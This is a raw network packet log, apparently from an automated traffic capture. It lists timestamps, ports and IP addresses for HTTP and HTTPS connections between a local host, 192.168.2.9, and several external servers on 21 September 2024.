                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.788748980 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.788764000 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.788769960 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.788795948 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.788808107 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.788965940 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.788971901 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.788983107 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.788988113 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.788995028 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.789000988 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.789016008 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.789031982 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.789050102 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.789077997 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.789089918 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.789096117 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.789100885 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.789107084 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.789112091 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.789118052 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.789124012 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.789124012 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.789145947 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.789194107 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.789272070 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.789278030 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.789288998 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.789294958 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.789320946 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.789324999 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.789331913 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.789334059 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.789339066 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.789376974 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.789387941 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.789443016 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.789449930 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.789459944 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.789465904 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.789472103 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.789477110 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.789494038 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.789495945 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.789530039 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.789539099 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.789633989 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.789733887 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.789740086 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.789755106 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.789762020 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.789767981 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.789778948 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.789786100 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.789787054 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.789820910 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.800159931 CEST44349726162.241.61.218192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.800355911 CEST49726443192.168.2.9162.241.61.218
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.800940037 CEST44349726162.241.61.218192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.801016092 CEST49726443192.168.2.9162.241.61.218
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.801491022 CEST44349726162.241.61.218192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.801557064 CEST49726443192.168.2.9162.241.61.218
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.802249908 CEST44349726162.241.61.218192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.802320957 CEST49726443192.168.2.9162.241.61.218
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.803147078 CEST44349726162.241.61.218192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.803209066 CEST49726443192.168.2.9162.241.61.218
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.804011106 CEST44349726162.241.61.218192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.804076910 CEST49726443192.168.2.9162.241.61.218
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.804572105 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.804579973 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.804585934 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.804630995 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.804631948 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.804640055 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.804641008 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.804646015 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.804652929 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.804687023 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.804716110 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.809144974 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.809242010 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.809248924 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.809261084 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.809267044 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.809273005 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.809278965 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.809286118 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.809315920 CEST4971280192.168.2.9103.130.147.211
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.809353113 CEST4971280192.168.2.9103.130.147.211
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.812509060 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.812516928 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.812522888 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.812573910 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.812592030 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.812598944 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.812599897 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.812619925 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.812643051 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.812671900 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.812720060 CEST44349729162.241.61.218192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.812724113 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.812731028 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.812764883 CEST44349729162.241.61.218192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.812767982 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.812804937 CEST49729443192.168.2.9162.241.61.218
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.812808037 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.812825918 CEST44349729162.241.61.218192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.812839031 CEST49729443192.168.2.9162.241.61.218
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.813210964 CEST49729443192.168.2.9162.241.61.218
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.814302921 CEST44349729162.241.61.218192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.814348936 CEST44349729162.241.61.218192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.814367056 CEST49729443192.168.2.9162.241.61.218
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.814373016 CEST44349729162.241.61.218192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.814403057 CEST49729443192.168.2.9162.241.61.218
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.814421892 CEST49729443192.168.2.9162.241.61.218
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.815314054 CEST44349729162.241.61.218192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.815387964 CEST49729443192.168.2.9162.241.61.218
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.816282988 CEST44349729162.241.61.218192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.816344976 CEST49729443192.168.2.9162.241.61.218
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.819880962 CEST44349726162.241.61.218192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.819955111 CEST49726443192.168.2.9162.241.61.218
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.833035946 CEST44349729162.241.61.218192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.833151102 CEST49729443192.168.2.9162.241.61.218
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.835192919 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.835207939 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.835213900 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.835218906 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.835226059 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.835263014 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.835268021 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.835278988 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.835280895 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.835287094 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.835293055 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.835313082 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.835331917 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.835747004 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.835752964 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.835767031 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.835772038 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.835788965 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.835794926 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.835800886 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.835805893 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.835808039 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.835818052 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.835823059 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.835828066 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.835829973 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.835839033 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.835845947 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.835850954 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.835876942 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.835896015 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.839673042 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.839746952 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.839751959 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.839766026 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.839772940 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.839778900 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.839785099 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.839787960 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.839790106 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.839827061 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.839843035 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.842974901 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.843054056 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.843060017 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.843065977 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.843071938 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.843101978 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.843107939 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.843121052 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.843234062 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.843281031 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.843288898 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.843296051 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.843302965 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.843317032 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.843348026 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.843353033 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.843359947 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.843367100 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.843379974 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.843413115 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.843421936 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.843481064 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.843487978 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.843493938 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.843503952 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.843509912 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.843514919 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.843521118 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.843524933 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.843527079 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.843548059 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.843579054 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.843641043 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.843647003 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.843653917 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.843658924 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.843664885 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.843669891 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.843677044 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.843688011 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.843694925 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.843696117 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.843702078 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.843709946 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.843727112 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.843750000 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.843750000 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.843786001 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.843794107 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.843805075 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.843811035 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.843822956 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.843836069 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.843841076 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.843842983 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.843848944 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.843853951 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.843858957 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.843863964 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.843868971 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.843880892 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.843888044 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.843902111 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.843924999 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.843931913 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.843936920 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.843940020 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.843943119 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.843950033 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.843961000 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.843971014 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.844001055 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.844017029 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.844023943 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.844032049 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.844043016 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.844048977 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.844063997 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.844069958 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.844077110 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.844077110 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.844084024 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.844095945 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.844101906 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.844108105 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.844115019 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.844134092 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.844151974 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.844155073 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.844338894 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.844346046 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.844352007 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.844357014 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.844362974 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.844367981 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.844382048 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.844386101 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.844393015 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.844398022 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.844398975 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.844404936 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.844412088 CEST8049711147.45.44.104192.168.2.9
